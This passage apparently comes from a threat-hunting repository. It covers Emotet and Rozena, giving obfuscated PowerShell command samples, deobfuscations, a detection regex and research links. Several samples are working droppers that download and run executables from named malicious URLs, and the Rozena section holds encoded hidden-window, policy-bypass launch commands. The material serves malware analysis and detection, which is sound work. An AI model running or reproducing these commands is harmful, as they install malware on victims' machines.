ADMAYwA2ADIAYQAwADEAOQBjADEAMgBiADgAOQAyADIAMgAwADAAOAA5ADEAYwBjADEAMAA4ADMAZQA2ADAAOQBkADQAMwAwADAAMQA1ADAANABjADQAYgA5ADMAMwAyAGEAMgA0ADYAMgAzADUANgA5ADgAMQBkADkAOQBjADgAMgAxADIAYwA0ADEANAA5AGYAZgBlADAAZAAyAGIAZQBhAGIAYgA5AGEANwBhADMAZAA3AGMAZAAxADgAOQBiADEAMQAzADUANABkAGUAOAAyAGQAMgAwAGUAMQAzAGQAZAA0AGEAZAA5ADIAYgA3AGQANwA3ADYAYwA0AGIAYwA0ADEAZAA1ADcAZgBlAGMAOQBmADcAZABjAGMAZQBiADcAZgBmADMAMAA1ADAAZQA3AGQANgBjADkAMQA0AGYANQBlADUAYgBjADIAOAAzADgAMQA3ADUAYQBjADAANgBhAGYAMgBiADAANwBlADYAZABlADYAZgA5ADEAMgBmADEAMgAyAGYAMAA3AGMANABhADMANwBhAGQANwAzADAANQBhADEAZABmAGMANAA5ADAAMgBlAGEAYQAwAGEAMwBkADQAYgA4ADQANgBlADcAZgAyADkAMQA3AGQAOABjADAANwA1AGQAYwA2ADEAOQBmADYAMwBiADQAMABmAGQAMwA3AGIAYQA4ADEAZAAzADQANABkADEAYwA0AGMAMgBiADQAMgBhADEANAA5AGMAZAA2AGUAYgAwAGMAZgAxADMAZgA3AGMAOQA4ADgANwAzADYAYwBjADIAMwA5ADgAMgA5AGIAZABlADIANwBiAGMAYgA0ADgAOAA3AGQAOAA3ADcANQA5ADIAMgAyADgAZQAwAGUAZgBmAGEAMAA3AGUAZgA5ADEANwAyADcAMwBlAGQANAAyADcAYgBhAGIAYgAzADEAMgA5AGYAOABlADUANQAwADQANgAwADQANQBmAGMAZABiAGQAMABjADQANQAxADYAYQAwADMANQA5ADQAOQAwAGUAYgAyAGUAMAAwAGEAOAAyAGEANQAxADEANgA2AGEANgA5ADEAMAA5AGQAYwA0AGMAZABmADkANwA5AGIAYgBkADIAZgA2AGQAZgBjADgAMABjAGUANgAxAGYAMwAyADUAZgBlADQAMgBlADQAOABkADAAMwAxADEANQBiADcANgA2ADUAMwBkAGEAOAAxADMAMgBkAGMAYQAxADQAYwA0ADMANAAyADkANwBmADAAOAA1AGEANwA5AGMANQBhADEANgBlADQAZAA5AGMAOAAyADMANgA1ADkAOAAwAGEAMwBlAGIAZABiADAAMQBmADkAZQA2AGYAMwAyAGIAMwAxADUAZABjADEAMQBlADMAYQBkAGYANgAxADEAZAAxADMAOQAyADIANQBmADgAOAAyAGMANwA4ADQAZgBmADQAMQBiAGQAZgBhADYAMABlADcAOQA4ADQANgA1ADEAYQBjADUAYwBjADcAMwA1ADMANwBjAGIANgA1ADQAZAA3ADIAOABjAGYAZQA0AGQAZgA2ADYAMQBkADEANQA3ADIAMQAyAGUAMwA3ADMAMAAxAGEAMABjADkAMQBhAGMAOQBhAGEAMQBkAGQAMgA2ADkAZgBiADcAYgA3AGUAYQBkAGYANAAwAGMANwBlADgAMwA3ADUAYwAxADgAYQA1AGEAMQA3ADcAMgBjAGEAMgAwADcAZgAzADMAOAA4AGEAZAA1ADcAZQBjADUAZQAwADkAMgAzAGYAZQBiAGMAYgA1ADAAZABjADUAMAA2AGEAYQAxAGYAYwBiAGQAYgBkAGIAMwBjADcANgAwADkAOABiADMAZQBmAGQAZAAzAGEAOQA4AGEAYgA3ADcANwBjAGMAMQAzAGEAMgA4ADMAYgBkAGUAMwA5ADgANQBiADMAMAAxAGQANQAxAGUANwA1AGUAYQA2ADgAZQA0AGUAYwBhAGUANABhAGUAOAA5AGMAZgAwADYAZQA0AGYAMQBlAGYAYQBkAGEAMAA1ADgAOQAzADAAMwAwADYAYwA5ADUANQA5AGMAMQBkADgANgBmADgANAAzADYAYwBjADIAMAAwADMAMgAwADMAMgBhADIAZABkADQAZQA0ADEAMwA2ADEANwA2ADQANwAxADIAYgAwADUAZgA1ADcAMAA3AGYAMgBjAGQANABjADAAZQA4ADgAMwBkAGQAYgA3ADgANAA2ADUAYgBkADAANgA4ADkAMgBkADEAOQBjADYAYQA0AGYAMgA2AGQAOABlAGYAZQBjAGIAMgBhADUAYQAyAGYAYQBjAGYAYwBjADIAZgAwADYANgA0ADkAZQAxADgAZABhADYAOQA2AGMANQAyADkAMQA5ADMAOQA3AGUANgA3ADEAMgAzAGUAOAA4AGYAYwA3AGIAMgA1ADIAYwAyAGYAMwAwADcAZABjADQAZgBhAGUANgA1ADEAMQAzADYANAA2ADgAYQA2AGQAMABjAGUAMgAwAGEAOQA3AGEAZgBjADAAZgBlADEAOQAxADkAZQA3AGQAOABhADYANgAwADUAMABkAGYAOQBmAGQAMwA=' |cOnvErtto-SeCureSTrINg -K (35..4)))))| . ( $VERBosePreFERENcE.TOStrIng()[1,3]+'x'-joIn'') 58 | ``` 59 | 60 | Deobfoscated 61 | ``` 62 | ( [RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe($nsadasd = &(new-object) random;$YYU = .(new-object) System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = 63 | http://lecap-services .fr/wiB9s/?http://nikitinskysport .ru/R5ytZ/?http://beauty-tea .com/hB2JAMO/?http://zekiatagur .com/gCWu/?http://arkonziv .com/Site7_Pixelhobbies/iV1PKqL/.Split(?);$SDC = $env:public \ $NSB ('.exe');foreach($asfc in $ADCX){try{$ 64 | YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&(Invoke-Item)($SDC);break;}catch{}) 65 | ``` 66 | 67 | 68 | 2. 69 | ``` 70 | SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) ) 71 | 72 | ``` 73 | Deobfuscated 74 | ``` 75 | set-item ('variable:skeail') ( [type]( 'environment' ) ) ; ( .('ls') ('contextexecutionvariable') ).value.invokecommand.('invokescript' ).invoke( ( ${skeail}::('getenvironmentvariable').invoke( 'diy',('process' )))) 76 | 77 | ``` 78 | 79 | 3. 80 | 81 | ``` 82 | $zWC='IUA';$QHY='http://trabanatours.com/u@http://pizzeriarondo.si/z8cG@http://diahmarsidi.com/MPCTKG@http://ogrodyusmiechu.pl/iubv8v@http://assurance-charente.fr/sfh'.Split('@');$aBp=([System.IO.Path]::GetTempPath()+'\mQN.exe');$pdZ =New-Object -com 'msxml2.xmlhttp';$tpk = New-Object -com 'adodb.stream';foreach($uiA in $QHY){try{$pdZ.open('GET',$uiA,0);$pdZ.send();$tpk.open();$tpk.type = 1;$tpk.write($pdZ.responseBody);$tpk.savetofile($aBp);Start-Process $aBp;break}catch{}} 83 | ``` 84 | 85 | #### Regular Expressions 86 | --- 87 | 88 | * Powershell.exe 89 | 90 | 1. 91 | `` 92 | ^(?=.*\bRuntIME\.InteroPsERvICEs\.marshAl\b)(?=.*\bGeTMEmbERS()\b)(?=.*\bSeCureSTrINg\b)(?=.*\bTOStrIng\b)(?=.*\bjoIn\b).*$ 93 | `` 94 | 95 | #### Resources 96 | --- 97 | 98 | Technical write-ups: 99 | * https://blog.malwarebytes.com/threat-analysis/2018/05/malware-analysis-decoding-emotet-part-1/ 100 | * https://blog.malwarebytes.com/threat-analysis/2018/06/malware-analysis-decoding-emotet-part-2/ 101 | * https://github.com/d00rt/emotet_research/blob/master/doc/EN_emotet_packer_analysis_and_config_extraction_v1.pdf 102 | 103 | Sandbox reports: 104 | * https://www.hybrid-analysis.com/sample/707fedfeadbfa4248cfc6711b5a0b98e1684cd37a6e0544e9b7bde4b86096963?environmentId=100 105 | * https://any.run/report/4e106b0156013a383d87c2978b5d318db6c110b38f32e8ea3b050525a10dbd3e/27e6f6dd-65b2-427b-ae71-31eaba74cabe 106 | * https://any.run/report/e7f763412e9c481da6ed408781f6d0f91510ffaf02260d5c63aa495614c36664/a5be1e80-b73c-4f4b-a67f-524bc7aecab5 107 | * https://any.run/report/895a3b6cc2799f681edde33cbbd1f0c7ba19010c89085030f6733771f75a7447/59d68dc1-416e-4785-bd74-6a3ed90e2d37 (@Lvanoel) 108 | 109 | Notes: 110 | 111 | For Cmd.exe 3. and Powershell.exe 2. : 112 | * https://twitter.com/tagnullde/status/1061977580335702019 113 | * CyberChef recipe for base64 part https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Raw_Inflate(0,0,'Adaptive',false,false)Split('http','%5C%5Cn%20http')&input=UFpCUlQ4SXdGSVgveWg2YUZJSmJOZnFnTkV0UVlZU0lLQkdVR0Y5S3VWdkx1cmFPYm1PUS9YY1pDYjZlKytXN0p3Y3R4L05RUStXYjlSYTQ4MmJnZ2k5WVB5c0oybEVVNVNMRXdqbmJKNFRuVEVzVE15NlpFc0NVRXdFM0dZblR5anlWMDFYeE1MaUEwZ3JJTXdpc0lodm1HSW1XdjdFY0o4bm9RbXlLeXVoQWd5T1Z0VDZ6bGh5K0ovTCtldnN5U2k1TXhoUVhNcFcrTlg1WkgweForSm5acFNWcnYxcW1heExYK3lLYWJ4Zi9WcWtUMkNWTUorZGk2ZVByNFRNZUR1VUtCeDlXU2RmQkE5eWw2RTB2dk5ERGQ3YzNtQ0plVFVNRXV1dzd5R3dQLytCZWUrL2hBUGFBYVd4eVlGeDAwT3k5OHFUMjJqMjZSNWZYUjNUYUxSaWFTaXZETnBGVWNHYXV2RmJZcFJOZG1oVDh5VWw2VHVqNjVFbHB3NW5qNHRnMGZ3PT0 114 | 115 | For Cmd.exe 4. and Powershell.exe 3. : 116 | * https://twitter.com/JRoosen/status/1062730072979881985 @JRoosen 117 | -------------------------------------------------------------------------------- /Malwares/Rozena.md: -------------------------------------------------------------------------------- 1 | ## Rozena 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Powershell 8 | 9 | 1. 10 | ``` 11 | -noniNtE -nOlOG -NOpROFI -WindoWsT hIdDEN -ExeCUTIonPOlic BypaSS -ec LgAoACgAJwAxACAAOAAgADcAIAA2ACAANQAgADMAIAAyACAAMAAgADMAIAA0ACAAOQAgADgAJwAtAHIAZQBQAGwAYQBDAGUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AcgBlAHAATABBAGMARQAnACAAJwAsACcAJwApAC0AZgAnAGkAJwAsACcAcwAnACwAJwByACcALAAnAGEAJwAsACcAYgAnACwAJwB2ACcALAAnAC0AJwAsACcAdAAnACwAJwBlACcALAAnAGwAJwApACAAVwB5AHgAVwBZAEkAOQBTAHUAOABNADUAIAAxADAAOwAmACgAJwBTAEUAdAAtAHYAJwArACcAQQBSAGkAYQBCACcAKwAnAEwAJwArACcARQAnACkAIABiADcAegBCAE8AOQBhAHoATgBMAHUATAAgADMAMgA7ACYAKAAmACgAJwB7ADAAfQAnAC0AZgAnAGcAQwBtACcAKQAoACgAJwA2ACAAMQAgADMAIAA3ACAANAAgADAAIAA4ACAAOQAgADAAIAA1ACAAMgAgADEAJwAtAFIAZQBQAEwAYQBjAEUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AUgBlAHAAbABBAGMAZQAnACAAJwAsACcAJwApAC0AZgAnAGEAJwAsACcAZQAnACwAJwBsACcALAAnAHQAJwAsACcAdgAnACwAJwBiACcALAAnAHMAJwAsACcALQAnACwAJwByACcALAAnAGkAJwApACkAIAB5AGcAeQBEAEIANgBaAHcAVABnAEQAOAAgADQAOQA7AC4AKAAoACcAOQAgADgAIAAwACAAMwAgADQAIAA3ACAAMgAgADYAIAA3ACAANQAgADEAIAA4ACcALQBSAEUAcABMAGEAQwBFACcAXAB3ACsAJwAsACcAewAkAHsAMAB9AH0AJwAtAFIAZQBQAGwAYQBDAGUAJwAgACcALAAnACcAKQAtAGYAJwB0ACcALAAnAGwAJwAsACcAcgAnACwAJwAtACcALAAnAHYAJwAsACcAYgAnACwAJwBpACcALAAnAGEAJwAsACcAZQAnACwAJwBzACcAKQAgAFAASABNAEkAdABHAFAAMgBrADUAcQB5ACgAKAAoACgAJgAoACgAJwA2ACAANwAgADkAIAAzACAAOAAgADQAIAA1ACAAMAAgADQAIAAxACAAMgAgADcAJwAtAHIAZQBwAEwAYQBjAGUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AcgBFAFAATABBAGMAZQAnACAAJwAsACcAJwApAC0AZgAnAGkAJwAsACcAYgAnACwAJwBsACcALAAnAC0AJwAsACcAYQAnACwAJwByACcALAAnAGcAJwAsACcAZQAnACwAJwB2ACcALAAnAHQAJwApACAAVwB5AHgAVwBZAEkAOQBTAHUAOABNADUAKQAuACgAJwB2AEEAbAB1ACcAKwAnAEUAJwApACsAMwA1ACkALQBBAHMAWwBjAGgAYQBSAF0AKQAuACgAJwB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAnAC0AZgAnAGcAJwAsACcAVAByAGkAbgAnACwAJwB0ACcALAAnAG8AcwAnACkALgBJAE4AVgBvAEsARQAoACkAKwAoACgAKAAmACgAKAAnADEAIAAzACAAOAAgADIAIAA3ACAAOQAgADQAIAAwACAAOQAgADYAIAA1ACAAMwAnAC0AcgBFAFAATABBAGMAZQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAEUAcABMAGEAYwBFACcAIAAnACwAJwAnACkALQBmACcAaQAnACwAJwBnACcALAAnAC0AJwAsACcAZQAnACwAJwByACcALAAnAGwAJwAsACcAYgAnACwAJwB2ACcALAAnAHQAJwAsACcAYQAnACkAIABiADcAegBCAE8AOQBhAHoATgBMAHUATAApAC4AKAAoACcAMAAgADQAIAAzACAAMgAgADEAJwAtAFIARQBwAEwAYQBjAEUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AUgBFAHAAbABhAEMARQAnACAAJwAsACcAJwApAC0AZgAnAHYAJwAsACcAZQAnACwAJwB1ACcALAAnAGwAJwAsACcAYQAnACkAKwA2ADkAKQAtAGEAcwBbAGMAaABhAHIAXQApAC4AKAAoACcAMgAgADUAIAAzACAAMgAgADQAIAAxACAANgAgADAAJwAtAFIARQBwAEwAQQBDAEUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AcgBFAHAAbABBAEMAZQAnACAAJwAsACcAJwApAC0AZgAnAGcAJwAsACcAaQAnACwAJwB0ACcALAAnAHMAJwAsACcAcgAnACwAJwBvACcALAAnAG4AJwApAC4AaQBOAHYAbwBrAEUAKAApACsAKAAoACgALgAoAC4AKAAnAHsAMAB9AHsAMQB9ACcALQBmACcARwBDACcALAAnAE0AJwApACgAJwBnAGUAdAAtAHYAYQBSAGkAQQBiACcAKwAnAEwAJwArACcAZQAnACkAKQAgAHkAZwB5AEQAQgA2AFoAdwBUAGcARAA4ACkALgAoACgAJwAxACAANAAgADAAIAAzACAAMgAnAC0AcgBFAHAAbABBAEMAZQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQBSAGUAUABMAEEAQwBFACcAIAAnACwAJwAnACkALQBmACcAbAAnACwAJwB2ACcALAAnAGUAJwAsACcAdQAnACwAJwBhACcAKQArADUAMAApAC0AYQBzAFsAYwBIAGEAcgBdACkALgAoACgAJwA1ACAAMQAgADQAIAA1ACAAMgAgADMAIAA2ACAAMAAnAC0AcgBFAFAAbABBAGMARQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQBSAEUAUABsAGEAYwBFACcAIAAnACwAJwAnACkALQBmACcAZwAnACwAJwBvACcALAAnAHIAJwAsACcAaQAnACwAJwBzACcALAAnAHQAJwAsACcAbgAnACkALgBpAE4AVgBvAEsARQAoACkAKQA7AFAATwBXAEUAUgBTAEgAZQBsAGwAIAAtAG4ATwBOAGkAbgBUAGUAUgBhAGMAVABJAHYARQAgAC0ATgBPAGwATwBHACAALQBOAG8AcAByAE8AZgAgAC0AdwBJAE4AZABvAHcAUwAgAEgAaQBEAEQARQBOACAALQBFAFgARQBDAFUAVABpAE8ATgBQAE8AIABiAHkAUABhAHMAUwAgACgALgAoACcAewAwAH0AewAxAH0AJwAtAGYAJwBnAEUAVAAtAHYAYQBSAGkAYQBCAEwAJwAsACcARQAnACkAIABQAEgATQBJAHQARwBQADIAawA1AHEAeQApAC4AKAAnAFYAQQBsAFUAZQAnACkALgAoACgAJwAwACAANAAgADIAIAAwACAANgAgADMAIAA1ACAAMQAnAC0AUgBFAHAATABBAGMARQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAGUAcABsAGEAQwBlACcAIAAnACwAJwAnACkALQBmACcAdAAnACwAJwBnACcALAAnAHMAJwAsACcAaQAnACwAJwBvACcALAAnAG4AJwAsACcAcgAnACkALgBJAE4AVgBPAEsAZQAoACkAKABbAGMAaABBAHIAWwBdAF0AKAAoAFsAQwBIAGEAcgBbAF0AXQAoACYAKAAnAG4AZQB3AC0ATwBCAEoAZQBjACcAKwAnAFQAJwApACAAKAAnAE4ARQB0AC4AVwBlAEIAYwBMAEkAZQBuAFQAJwApACkALgAoACgAJwAxACAAOQAgADAAIAAyACAAOAAgADkAIAA1ACAAMQAgADQAIAA2ACAAMwAgADEAMAAgADIAIAA3ACcALQBSAEUAcABsAEEAYwBFACcAXAB3ACsAJwAsACcAewAkAHsAMAB9AH0AJwAtAHIAZQBQAGwAYQBjAGUAJwAgACcALAAnACcAKQAtAGYAJwB3ACcALAAnAGQAJwAsACcAbgAnACwAJwByACcALAAnAHMAJwAsACcAYQAnACwAJwB0ACcALAAnAGcAJwAsACcAbAAnACwAJwBvACcALAAnAGkAJwApAC4ASQBuAHYAbwBrAEUAKAAkAGUAbgB2ADoAdABlAG0AcAArACcAXABIAGkANgBrAEkANwBoAGMAeABaAHcAVQAnACkAKQB8ACUAewAkAEkAWgA4AHIAUQBjAGUAVQBPAGcAQgA3AD0AMAB9AHsAJABfAC0AYgB4AE8AcgAnAHkAOAAyAFoAVwBvAEMAYgB5AE8AWQBuAHkAbgA2AEwAdABwAGIAZAB1AEYARQBQADgAdAA4AG0AawAnAFsAJABJAFoAOAByAFEAYwBlAFUATwBnAEIANwArACsAJQAyADkAXQB9ACkALQBKAE8AaQBuACcAJwApADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABlAG4AdgA6AHQAZQBtAHAAJwBcAEgAaQA2AGsASQA3AGgAYwB4AFoAdwBVACcA 12 | ``` 13 | 14 | 2. 15 | ``` 16 | -wIndOwsTY HiddeN -c "(-joIN(('262826282767272b27636d27292828273220372036203520312034203920382034203320302037272d7265504c414345275c772b272c277b247b307d7d272d5265504c4163652720272c2727292d66276c272c2776272c2773272c2762272c2761272c272d272c2774272c2765272c2769272c2772272929205763546667734d3131424c5720323b2e28277345742d7661526941626c4527292067484e4370343536613043352037343b2e28277365272b27742d5661726941424c272b27452729206770787931356e49654e436f2032343b2e2828273020352032203920362034203320382034203120372035272d7245506c614345275c772b272c277b247b307d7d272d5245504c6163652720272c2727292d662773272c2762272c2774272c2772272c2761272c2765272c2776272c276c272c2769272c272d272920416645365243554b584b5938282828282e28262828273020312032272d7245504c616365275c772b272c277b247b307d7d272d5265706c4143652720272c2727292d662767272c2763272c276d272928276765542d5641272b27726961272b27424c272b2745272929205763546667734d3131424c57292e282756614c556527292b3433292d61535b636861725d292e282827312036203220312033203020352034272d7245504c616345275c772b272c277b247b307d7d272d5245706c6163452720272c2727292d662769272c2774272c2773272c2772272c2767272c276e272c276f27292e494e566f6b4528292b282828262828273420372032203320392038203520362038203120302037272d7245704c416365275c772b272c277b247b307d7d272d5245706c6143452720272c2727292d66276c272c2762272c2774272c272d272c2767272c2772272c2769272c2765272c2761272c277627292067484e437034353661304335292e28277b317d7b327d7b307d272d662765272c2756414c272c277527292b3237292d41535b434861525d292e28277b317d7b307d7b327d272d66274e272c27546f73547269272c274727292e696e566f6b6528292b2828282628277b317d7b327d7b307d272d662745272c274765742d56272c2741526961424c2729206770787931356e49654e436f292e282827302033203120322034272d5265506c614345275c772b272c277b247b307d7d272d7265706c4143652720272c2727292d662776272c276c272c2775272c2761272c276527292b3735292d41535b436841725d292e28277b317d7b307d272d66276e47272c27546f7354724927292e494e564f6b452829293b506f7745527348656c4c202d6e6f6e694e7445202d6e4f6c4f47202d4e4f70524f4649202d57696e646f5773542068496444454e202d457865435554496f6e504f6c696320427970615353202826282628277b307d272d662767434d27292828273420312032203820352030203920362030203720332031272d5265704c616365275c772b272c277b247b307d7d272d5245504c4143452720272c2727292d662761272c2765272c2774272c276c272c2767272c2776272c2769272c2762272c272d272c277227292920416645365243554b584b5938292e28277b327d7b317d7b307d272d662765272c2755272c2776616c27292e282827302033203120302035203620342032272d5245504c616345275c772b272c277b247b307d7d272d5265706c4143452720272c2727292d662774272c2773272c2767272c276f272c276e272c2772272c276927292e696e566f4b4528294c67416f414367414a774178414341414f4141674144634149414132414341414e51416741444d4149414179414341414d41416741444d4149414130414341414f514167414467414a774174414849415a5142514147774159514244414755414a774263414863414b77416e414377414a7742374143514165774177414830416651416e414330416367426c414841415441424241474d415251416e414341414a774173414363414a774170414330415a67416e41476b414a774173414363416377416e414377414a774279414363414c41416e414745414a774173414363415967416e414377414a774232414363414c41416e414330414a774173414363416441416e414377414a77426c414363414c41416e414777414a7741704143414156774235414867415677425a41456b414f514254414855414f41424e4144554149414178414441414f77416d414367414a7742544145554164414174414859414a774172414363415151425341476b4159514243414363414b77416e414577414a774172414363415251416e41436b41494142694144634165674243414538414f51426841486f415467424d414855415441416741444d414d674137414359414b41416d414367414a774237414441416651416e414330415a67416e4147634151774274414363414b51416f414367414a774132414341414d51416741444d4149414133414341414e4141674144414149414134414341414f5141674144414149414131414341414d674167414445414a774174414649415a514251414577415951426a414555414a774263414863414b77416e414377414a7742374143514165774177414830416651416e414330415567426c414841416241424241474d415a51416e414341414a774173414363414a774170414330415a67416e414745414a774173414363415a51416e414377414a774273414363414c41416e414851414a774173414363416467416e414377414a774269414363414c41416e41484d414a774173414363414c51416e414377414a774279414363414c41416e41476b414a77417041436b41494142354147634165514245414549414e674261414863415641426e414551414f414167414451414f514137414334414b41416f414363414f5141674144674149414177414341414d7741674144514149414133414341414d6741674144594149414133414341414e5141674144454149414134414363414c514253414555416341424d41474541517742464143634158414233414373414a774173414363416577416b414873414d414239414830414a774174414649415a5142514147774159514244414755414a774167414363414c41416e414363414b514174414759414a774230414363414c41416e414777414a774173414363416367416e414377414a774174414363414c41416e414859414a774173414363415967416e414377414a774270414363414c41416e414745414a774173414363415a51416e414377414a77427a414363414b514167414641415341424e41456b4164414248414641414d6742724144554163514235414367414b41416f414367414a67416f414367414a774132414341414e77416741446b414941417a414341414f4141674144514149414131414341414d4141674144514149414178414341414d674167414463414a774174414849415a514277414577415951426a414755414a774263414863414b77416e414377414a7742374143514165774177414830416651416e4143304163674246414641415441424241474d415a51416e414341414a774173414363414a774170414330415a67416e41476b414a774173414363415967416e414377414a774273414363414c41416e414330414a774173414363415951416e414377414a774279414363414c41416e414763414a774173414363415a51416e414377414a774232414363414c41416e414851414a7741704143414156774235414867415677425a41456b414f514254414855414f41424e414455414b514175414367414a7742324145454162414231414363414b77416e414555414a774170414373414d77413141436b414c51424241484d415777426a4147674159514253414630414b514175414367414a774237414449416651423741444d41665142374144454166514237414441416651416e414330415a67416e414763414a774173414363415641427941476b416267416e414377414a774230414363414c41416e414738416377416e41436b414c67424a4145344156674276414573415251416f41436b414b77416f414367414b41416d414367414b41416e414445414941417a414341414f4141674144494149414133414341414f5141674144514149414177414341414f5141674144594149414131414341414d77416e4143304163674246414641415441424241474d415a51416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c514279414555416341424d4147454159774246414363414941416e414377414a77416e41436b414c51426d414363416151416e414377414a77426e414363414c41416e414330414a774173414363415a51416e414377414a774279414363414c41416e414777414a774173414363415967416e414377414a774232414363414c41416e414851414a774173414363415951416e41436b41494142694144634165674243414538414f51426841486f415467424d4148554154414170414334414b41416f414363414d414167414451414941417a414341414d674167414445414a7741744146494152514277414577415951426a414555414a774263414863414b77416e414377414a7742374143514165774177414830416651416e4143304155674246414841416241426841454d415251416e414341414a774173414363414a774170414330415a67416e414859414a774173414363415a51416e414377414a774231414363414c41416e414777414a774173414363415951416e41436b414b77413241446b414b514174414745416377426241474d41614142684148494158514170414334414b41416f414363414d674167414455414941417a414341414d6741674144514149414178414341414e674167414441414a77417441464941525142774145774151514244414555414a774263414863414b77416e414377414a7742374143514165774177414830416651416e4143304163674246414841416241424241454d415a51416e414341414a774173414363414a774170414330415a67416e414763414a774173414363416151416e414377414a774230414363414c41416e41484d414a774173414363416367416e414377414a774276414363414c41416e414734414a774170414334416151424f4148594162774272414555414b414170414373414b41416f414367414c67416f414334414b41416e414873414d414239414873414d514239414363414c51426d4143634152774244414363414c41416e414530414a774170414367414a77426e4147554164414174414859415951425341476b4151514269414363414b77416e414577414a774172414363415a51416e41436b414b51416741486b415a774235414551415167413241466f4164774255414763415241413441436b414c67416f414367414a774178414341414e414167414441414941417a414341414d67416e4143304163674246414841416241424241454d415a51416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c514253414755415541424d4145454151774246414363414941416e414377414a77416e41436b414c51426d414363416241416e414377414a774232414363414c41416e414755414a774173414363416451416e414377414a774268414363414b514172414455414d414170414330415951427a4146734159774249414745416367426441436b414c67416f414367414a774131414341414d5141674144514149414131414341414d67416741444d4149414132414341414d41416e4143304163674246414641416241424241474d415251416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c51425341455541554142734147454159774246414363414941416e414377414a77416e41436b414c51426d414363415a77416e414377414a774276414363414c41416e414849414a774173414363416151416e414377414a77427a414363414c41416e414851414a774173414363416267416e41436b414c6742704145344156674276414573415251416f41436b414b51413741464141547742584145554155674254414567415a5142734147774149414174414734415477424f41476b4162674255414755415567426841474d415641424a414859415251416741433041546742504147774154774248414341414c51424f4147384163414279414538415a674167414330416477424a414534415a41427641486341557741674145674161514245414551415251424f414341414c514246414667415251424441465541564142704145384154674251414538414941426941486b415541426841484d4155774167414367414c67416f41436341657741774148304165774178414830414a774174414759414a77426e4145554156414174414859415951425341476b4159514243414577414a774173414363415251416e41436b4149414251414567415451424a414851415277425141444941617741314148454165514170414334414b41416e4146594151514273414655415a51416e41436b414c67416f414367414a774177414341414e4141674144494149414177414341414e67416741444d4149414131414341414d51416e4143304155674246414841415441424241474d415251416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c5142794147554163414273414745415177426c414363414941416e414377414a77416e41436b414c51426d414363416441416e414377414a77426e414363414c41416e41484d414a774173414363416151416e414377414a774276414363414c41416e414734414a774173414363416367416e41436b414c67424a4145344156674250414573415a51416f41436b414b41426241474d41614142424148494157774264414630414b41416f41467341517742494147454163674262414630415851416f414359414b41416e414734415a514233414330415477424341456f415a51426a414363414b77416e414651414a774170414341414b41416e4145344152514230414334415677426c414549415977424d41456b415a514275414651414a77417041436b414c67416f414367414a774178414341414f5141674144414149414179414341414f41416741446b4149414131414341414d5141674144514149414132414341414d774167414445414d4141674144494149414133414363414c514253414555416341427341454541597742464143634158414233414373414a774173414363416577416b414873414d414239414830414a774174414849415a514251414777415951426a414755414a774167414363414c41416e414363414b514174414759414a774233414363414c41416e414751414a774173414363416267416e414377414a774279414363414c41416e41484d414a774173414363415951416e414377414a774230414363414c41416e414763414a774173414363416241416e414377414a774276414363414c41416e41476b414a77417041433441535142754148594162774272414555414b41416b414755416267423241446f416441426c4147304163414172414363415841424941476b414e67427241456b414e77426f41474d4165414261414863415651416e41436b414b514238414355416577416b41456b4157674134414849415551426a41475541565142504147634151674133414430414d414239414873414a4142664143304159674234414538416367416e41486b414f41417941466f415677427641454d4159674235414538415751427541486b41626741324145774164414277414749415a41423141455941525142514144674164414134414730416177416e414673414a41424a41466f414f414279414645415977426c414655415477426e414549414e774172414373414a51417941446b415851423941436b414c51424b4145384161514275414363414a774170414473415567426c4147304162774232414755414c51424a414851415a514274414341414a41426c4147344164674136414851415a514274414841414a77426341456741615141324147734153514133414767415977423441466f416477425641436341'-SplIt'(?<=\G.{2})(?!$)')|%{[cOnVErT]::('{0}{1}'-f'ToiNt1','6').InvokE(($_),16)-aS[ChAR]}))|&('iNVOKE-EXPreS'+'sIOn') 17 | ``` 18 | 19 | Deobfuscated 20 | ``` 21 | .(('1 8 7 6 5 3 2 0 3 4 9 8'-rePlaCe'\w+','{${0}}'-repLAcE' ','')-f'i','s','r','a','b','v','-','t','e','l') WyxWYI9Su8M5 10;&('SEt-v'+'ARiaB'+'L'+'E') b7zBO9azNLuL 32;&(&('{0}'-f'gCm')(('6 1 3 7 4 0 8 9 0 5 2 1'-RePLacE'\w+','{${0}}'-ReplAce' ','')-f'a','e','l','t','v','b','s','-','r','i')) ygyDB6ZwTgD8 49;.(('9 8 0 3 4 7 2 6 7 5 1 8'-REpLaCE'\w+','{${0}}'-RePlaCe' ','')-f't','l','r','-','v','b','i','a','e','s') PHMItGP2k5qy((((&(('6 7 9 3 8 4 5 0 4 1 2 7'-repLace'\w+','{${0}}'-rEPLAce' ','')-f'i','b','l','-','a','r','g','e','v','t') WyxWYI9Su8M5).('vAlu'+'E')+35)-As[chaR]).('{2}{3}{1}{0}'-f'g','Trin','t','os').INVoKE()+(((&(('1 3 